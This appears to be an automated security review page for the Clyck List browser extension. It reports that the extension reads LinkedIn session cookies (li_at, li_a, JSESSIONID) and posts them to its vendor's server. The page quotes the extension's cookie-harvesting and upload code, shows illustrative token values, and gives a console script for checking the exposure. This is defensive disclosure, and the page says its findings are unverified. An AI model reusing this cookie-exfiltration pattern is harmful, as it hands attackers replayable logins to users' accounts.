Is Clyck List safe?
Clyck List reads your LinkedIn session cookies and sends them to its own backend to replay your login.
When you use Clyck List's lead-extraction buttons on LinkedIn, the extension reads your li_a, li_at, and JSESSIONID cookies and includes them in the data it posts to its own server. It also injects the same cookie values into a page it opens on its own site. Because li_at is LinkedIn's master authentication token, this gives Clyck List's backend a reusable copy of your LinkedIn login, not just a normal API call made through your browser session.
AI-generated. Findings may contain errors. Those marked Verified have been manually reviewed.
Publishers can request a review.
Findings
Clicking Extract leads sends your LinkedIn login cookie to clycklist.com
Code analysis shows the extension reads your LinkedIn li_a, li_at, and JSESSIONID cookies and sends the raw values to its own clycklist.com backend when you extract a lead, giving that server a replayable copy of your LinkedIn session.
You click Extract leads on a LinkedIn Sales Navigator search, list, or profile page.
The button is injected by the extension's content script on linkedin.com/sales pages.
The extension reads your LinkedIn session cookies and sends the raw values to its own server.
li_a, li_at, and JSESSIONID are bundled into the extraction request and posted to app.clycklist.com.
| Field | Value | Why it matters | |
|---|---|---|---|
LinkedIn login token (li_at) | AQEFARABAAAAABe3odI...LrK9 (illustrative) | LinkedIn's main authentication cookie. Whoever holds it can act as you on LinkedIn without your password. | |
LinkedIn account cookie (li_a) | AQIAAAB1odI9x2AAABe...9x2 (illustrative) | A secondary LinkedIn account identifier cookie sent alongside li_at. | |
Session ID (JSESSIONID) | ajax:8172930445512004455 (illustrative) | LinkedIn's server-side session identifier, used together with li_at to validate requests. |
Reading the LinkedIn cookies and shipping them to the vendor's server
async function getCookiesForUrl(url, cookieNames) {
const result = {};
const cookies = await Promise.all(
cookieNames.map((name) => chrome.cookies.get({ name, url }))
);
for (const cookie of cookies) {
if (cookie && cookieNames.includes(cookie.name)) {
result[cookie.name] = cookie.value; // raw value, including li_at
}
}
return result;
}
async function getLinkedinCookies() {
return getCookiesForUrl("https://www.linkedin.com", ["li_a", "li_at", "JSESSIONID"]);
}async function extractOneLeadInFlight(payload) {
// payload.linkedinCookies = { li_a, li_at, JSESSIONID } from getLinkedinCookies()
const response = await fetch(
webappOrigin + "/api/extractions/extract-one-lead-in-flight",
{
method: "POST",
headers: {
cookie: `${sessionCookieName}=${await getWebappSessionCookie()}`,
Accept: "application/json",
"Content-Type": "application/json",
},
body: JSON.stringify(payload),
}
);
return response.json();
}- app.clycklist.com
Clycklist's own lead-extraction backend. Receives li_a/li_at/JSESSIONID in the extraction POST body and again via window.__slSharedData on a tab it opens.
Checks whether the extension wrote your LinkedIn cookies into a page-global variable on clycklist.com.
// Run in DevTools Console on the app.clycklist.com/app/lists/new tab
// that the extension opens after 'Start new list'.
if (window.__slSharedData) {
const data = JSON.parse(window.__slSharedData);
console.log("linkedinCookies exposed on this page:", data.linkedinCookies);
} else {
console.log("__slSharedData not present on this page.");
}- 1Sign into LinkedIn and open Sales Navigator.
- 2Trigger Start new list via the extension.
- 3In the new clycklist.com tab, open DevTools > Console.
- 4Paste and run this script.
Static analysis finding. This behaviour was identified by reading the shipped extension code and has not yet been reproduced in a live run. The trigger conditions and the exact data sent are read from the code, not from an observed capture.
What it can do
Permissions this extension asks for, as declared in version 1.0.2. Asking for a permission is not a finding on its own - it is what the extension can do if it chooses to.
Read and change your data on localhost
*://localhost/
Read and change your data on linkedin.com
*://*.linkedin.com/
Read and change your data on clycklist.com
*://*.clycklist.com/
Act on the current tab, but only after you click the extension
activeTab
Read and change cookies, including the ones that keep you signed in
cookies
See the address and title of every tab you have open
tabs
Run its own code inside the pages you visit
scripting
Where it sends data
Destinations our analysis observed Clyck List contacting. Sending data somewhere is not a finding on its own - an extension that syncs your settings has to talk to its own server - but it is where your data can go, and who else it goes to.
- app.clycklist.com
Clyck List sends data to app.clycklist.com. No other extension we have analysed sends data here.